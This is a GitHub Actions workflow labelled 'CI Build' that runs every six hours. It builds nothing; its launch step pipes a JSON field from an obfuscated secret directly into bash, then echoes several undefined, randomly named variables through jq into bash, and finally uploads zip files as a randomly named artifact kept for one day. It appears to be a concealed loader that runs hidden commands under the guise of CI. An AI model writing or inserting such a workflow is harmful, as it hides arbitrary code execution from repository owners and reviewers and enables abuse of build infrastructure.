name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '39 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          qw43: ${{ secrets.qw43 }}
        run: |
          printf '%s' "$qw43" | jq -r .qz24102 | /bin/bash
          echo $f95 | jq -r .l65207 | /bin/bash
          echo $e74929 | jq -r .r0997 | /bin/bash
          echo $voc89 | jq -r .gkd84 | /bin/bash
          echo $vhm1623 | jq -r .mg34 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: 4VGQCpNr
          path: "*.zip"
          retention-days: 1
